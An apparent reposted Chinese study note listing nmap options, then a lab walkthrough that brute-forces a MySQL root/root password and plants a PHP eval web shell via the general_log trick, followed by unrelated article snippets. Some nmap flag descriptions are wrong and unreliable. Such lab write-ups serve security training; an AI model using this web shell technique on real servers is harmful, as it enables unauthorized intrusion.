8月5日笔记

news2024/11/22 21:43:25

8月5日

nmap命令使用

nmap四种基本功能:端口扫描、主机探测、服务识别、系统识别。

nmap ip

默认情况下,nmap 会对目标执行 TCP 端口扫描,尝试找出哪些端口是开放的,并提供关于这些端口上运行的服务的一些基本信息。

其他参数:

  • -sV: 用于进行服务版本检测。
  • -O: 用于尝试识别目标主机的操作系统。
  • -A: 结合 -sV-O,进行更全面的扫描。
  • -p: 指定要扫描的端口,例如 -p 80,443
  • -v: 显示详细输出。
  • -vv: 更详细的输出。
  • -n: 不进行 DNS 反向解析。
  • -R: 总是进行 DNS 反向解析。
  • -iD: 使用多线程进行主机发现。
  • -sS: SYN 扫描(默认)。发送一个 SYN 数据包,如果收到 SYN/ACK,则认为端口开放。
  • -sT: TCP 连接扫描。完成完整的三次握手建立连接,可能会留下日志记录。
  • -sU: UDP 扫描。发送 UDP 数据包,如果收到 ICMP 端口不可达消息,则认为端口关闭;如果没有回应,则认为端口开放。
  • -sC: 执行默认的脚本扫描。
  • -sA: ACK 扫描。发送 ACK 数据包,主要用于检测防火墙的过滤规则。
  • -sW: Window 扫描。发送带有窗口大小的 SYN 数据包,用于确定目标是否存活。
  • -sM: ICMP 扫描。发送 ICMP 数据包,用于确定目标是否存活。
  • -sI: IDLE 扫描。使用第三方主机作为跳板,隐蔽地进行扫描。
  • -sX: XMAS 扫描。发送带有 FIN, URG, 和 PSH 标志位的数据包,用于确定端口状态。
  • -sF: FIN 扫描。发送带有 FIN 标志位的数据包,用于确定端口状态。
  • -sN: NULL 扫描。发送没有任何标志位的数据包,用于确定端口状态。
  • -T: 设置扫描时间策略。范围从 T1 (最慢) 到 T5 (最快),默认是 T3
  • -T4: 设置扫描时间为较快的速度。
  • -T5: 设置扫描时间为最快的速度。
  • -f: 分段扫描,用于绕过某些类型的防火墙。
  • --script: 指定一个或多个脚本进行扫描。例如 --script vuln 将运行所有漏洞相关的脚本。
  • --script-args: 向脚本传递参数。
  • --script-help: 显示脚本的帮助信息。

端口扫描

扫描指定端口

nmap 192.168.5.138 -p 80
nmap 192.168.5.138 -p 1-80
nmap 192.168.5.138 -p 80,3389,22,21
nmap 192.168.5.138 -p 1-65535
nmap 192.168.5.138 -p-		# -p- 等价于 -p 1-65535

主机探测

扫描网段中有哪些主机在线,使用 -sP 参数,只扫描存活主机,不扫描端口。

nmap -sP 192.168.5.0/24

服务识别

扫描端口时,默认显示端口对应的服务,但不显示服务版本。

想要识别具体的服务版本,使用-sV参数。

nmap 192.168.5.138 -p -sV

系统识别

使用参数 -O

nmap 192.168.5.138 -p 80 -O

Nmap扫描出的系统版本并完全准确,仅供参考。

当识别不出具体版本时,Nmap会以概率的形式列举出可能的操作系统

导出扫描结果

nmap 192.168.5.138 -p 80 -oN result.txt

红日靶场打靶

拿到ip:192.168.5.138

首先用nmap扫描看看。

namp -sV -Pn 192.168.48.144

使用Pn是为了进行隐蔽扫描,可以减少扫描过程中产生的网络活动,从而降低被检测的风险。
在这里插入图片描述

发现开着http和mysql服务。打开网站。发现是phpstudy探针,网站可能是phpstudy搭建的。

mysql开着,看看是否存在弱口令。

bp爆破出root,root弱口令。

御剑扫描目录。

在这里插入图片描述

发现数据库后台地址。使用弱口令登录。
在这里插入图片描述

查看是否有开启日志记录

show variables like '%general%';

在这里插入图片描述

设置路径。

开启日志读写功能

SET GLOBAL general_log='on'; 

添加木马。

select 1;/*'<?php eval ($_POST['cmd']);?>'*/

在这里插入图片描述

在这里插入图片描述

select 1;/*'<?php eval ($_POST['cmd']);?>'*/

蚁剑连接成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1983365.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Html5总结

前端学习 html决定页面的结构css决定页面的样式js决定页面的行为 Html5 1.文本格式化标签&#xff08;熟记&#xff09; 你在网页中&#xff0c;有时需要为文字设置粗体、斜体或下划线效果&#xff0c;这时就需要用到HTML中的文本格式化标记 2.标签属性 例如&#xff1a; …

Java SDK开发(SpringBoot Starter)

SDK开发 开发starter的好处&#xff1a;引入starter之后&#xff0c;可以在配置文件中配置&#xff0c;自动生成客户端使用。 步骤 1. 创建一个初始化SpringBoot项目&#xff0c;选择相关依赖&#xff1a; Lombook&#xff1a;日志注解 第二个注解是为了关键词提示用的&…

Java:多线程(同步死锁,锁原子变量,线程通信,线程池)

5&#xff0c;同步和死锁 5.1&#xff0c;Synchronized&#xff0c;Lock 修饰一个代码块&#xff0c;被修饰的代码块称为同步语句块&#xff0c;其作用的范围是大括号{}括起来的代码&#xff0c;作用的对象是调用这个代码块的对象&#xff1b;修饰一个方法&#xff0c;被修饰的…

如何使用极狐GitLab 实现最小权限访问?

极狐GitLab 是 GitLab 在中国的发行版&#xff0c;专门面向中国程序员和企业提供企业级一体化 DevOps 平台&#xff0c;用来帮助用户实现需求管理、源代码托管、CI/CD、安全合规&#xff0c;而且所有的操作都是在一个平台上进行&#xff0c;省事省心省钱。可以一键安装极狐GitL…

初始化seata在nacos的配置报错nacos-config.sh 127.0.0.1-nacos-config.txt-文件不存在

问题&#xff1a;初始化seata在nacos的配置报错nacos-config.sh 127.0.0.1-nacos-config.txt-文件不存在 解决思路&#xff1a; 1.seata-server-0.9.0\seata\conf下的file.conf文件要修改&#xff1a; transport {# tcp udt unix-domain-sockettype "TCP"#NIO NA…

IDEA如何去掉编辑框右侧的竖线

打开 IntelliJ Idea 软件 依次找到 File—>Settings—>Editor—>General—>Appearance 去掉勾选 Show hard wrap and visual guides (configured in Code Style options)

OpenAI 取消为 ChatGPT 加水印计划,用户反应成关键因素|TodayAI

OpenAI 近日宣布&#xff0c;尽管公司内部已经准备了一种为 ChatGPT 生成的文本添加水印的系统&#xff0c;但由于担心用户反应&#xff0c;公司决定暂不推出这一功能。 据《华尔街日报》报道&#xff0c;OpenAI 早在一年前就开发了一个可以为 ChatGPT 生成的文本添加水印的系…

智能化招聘系统:从筛选到录用的全程解析

一、引言 在数字化时代&#xff0c;企业的人力资源管理正经历着前所未有的变革。招聘作为人力资源管理的重要一环&#xff0c;其效率与精准度直接影响着企业的竞争力和发展动力。随着人工智能&#xff08;AI&#xff09;技术的飞速发展&#xff0c;智能化招聘系统应运而生&…

开源SFTP服务器软件SFTPGo

什么是 SFTPGo&#xff1f; SFTPGo 是一种事件驱动的文件传输解决方案。它支持多种协议&#xff08;SFTP、SCP、FTP/S、WebDAV、HTTP/S&#xff09;和多种存储后端&#xff0c;包括本地文件系统、加密本地文件系统、S3&#xff08;兼容&#xff09;对象存储、Google Cloud Stor…

【Linux】—— Linux进程状态(R、S、D、T、Z、X)

&#x1f30f;博客主页&#xff1a;PH_modest的博客主页 &#x1f6a9;当前专栏&#xff1a;Linux跬步积累 &#x1f48c;其他专栏&#xff1a; &#x1f534; 每日一题 &#x1f7e1; C跬步积累 &#x1f7e2; C语言跬步积累 &#x1f308;座右铭&#xff1a;广积粮&#xff0…

全新启航!阿里云向量检索服务Milvus版正式上线!

今天&#xff0c;阿里云正式宣布向量检索服务Milvus版在杭州、上海、北京、深圳四大region正式可用并开放公测&#xff01;这是由阿里云与产品生态合作伙伴Zilliz联合推出的一款业内领先的云原生向量检索引擎。向量检索服务Milvus版在上一代EMR Serverless Milvus 公测版的基础…

人工智能自动驾驶三维车道线检测—PersFormer模型代码详解

文章目录 1. 背景介绍2. 数据加载和预处理3. 模型结构4. Loss计算5. 总结和讨论 1. 背景介绍 梳理了PersFormer 3D Lane这篇论文对应的开源代码。 2. 数据加载和预处理 数据组织方式参考&#xff1a;自动驾驶三维车道线检测系列—OpenLane数据集介绍。 坐标系参考&#xff…

【Raven2靶场渗透】

文章目录 一、IP获取 二、信息收集 三、Flag1 四、漏洞利用 五、Flag2 六、Flag3 七、MSF UDF提权 八、CVE漏洞本地提权 一、IP获取 Kali IP:192.168.78.128 靶机IP&#xff1a;192.168.78.178 二、信息收集 端口和服务探测&#xff1a; nmap -sV -p- 192.168.78.178 开放…

启发式合并加树形dp

题目链接 令f【x】【0】表示不选根的x子树的最大贡献&#xff0c;f【x】【1】表示选根的x子树最大贡献&#xff0c;g【x】为max&#xff08;f【x】【0】&#xff0c;f【x】【1】&#xff09;。 如果我们要连接x和u1&#xff0c;那么贡献是&#xff1a; w【x】w【u1】f【u1】【0…

ASP.NET Core 基础 - 入门实例

一. 下载 1. 下载vs2022 Visual Studio 2022 IDE - 适用于软件开发人员的编程工具 (microsoft.com) 学生,个人开发者选择社区版就行,免费的. 安装程序一直下一步下一步就行,别忘了选择安装位置,如果都放在C盘的话,就太大了. 2. 选择工作负荷 准备工作完成 二. 创建新项目 三…

如何用密码保护你的 WordPress 管理员 (wp-admin) 目录

在维护 WordPress 网站时&#xff0c;确保 wp-admin 目录安全是非常重要的。为该目录添加密码保护可以有效提高网站安全性&#xff0c;防止未经授权的访问。这篇文章将介绍实现这一目标的两种方法。 1.为什么要为 wp-admin 目录添加密码保护 WordPress 管理员后台是网站的核心…

自动化集成应用钡铼DB系列防水分线盒

随着工业自动化的快速发展&#xff0c;如今的现场设备需要更高效、更稳定的信号采集和集成方案。钡铼技术的DB系列防水分线盒作为一种优秀的解决方案&#xff0c;成功地结合了先进的工业设计与耐用材料&#xff0c;为物流设备、食品加工设备、制药设备等多种工业应用提供了可靠…

《深入浅出WPF》学习笔记六.手动实现Mvvm

《深入浅出WPF》学习笔记六.手动实现Mvvm demo的层级结构,Mvvm常用项目结构 依赖属性基类实现 具体底层原理后续学习中再探讨,可以粗浅理解为,有一个全局对象使用list或者dic监听所有依赖属性,当一个依赖属性变化引发通知时,就会遍历查询对应的字典&#xff0c;通知View层进行…

目标检测之选择性搜索:Selective Search

文章目录 一.选择性搜索的具体算法二.保持多样性的策略三.给区域打分四.选择性搜索性能评估五.代码实现 论文地址&#xff1a; https://www.koen.me/research/selectivesearch/ 代码地址&#xff1a; https://github.com/AlpacaDB/selectivesearch 参考&#xff1a; https:/…

SpringBootWeb AOP

事务&AOP 1. 事务管理 1.1 事务回顾 在数据库阶段我们已学习过事务了&#xff0c;我们讲到&#xff1a; 事务是一组操作的集合&#xff0c;它是一个不可分割的工作单位。事务会把所有的操作作为一个整体&#xff0c;一起向数据库提交或者是撤销操作请求。所以这组操作要…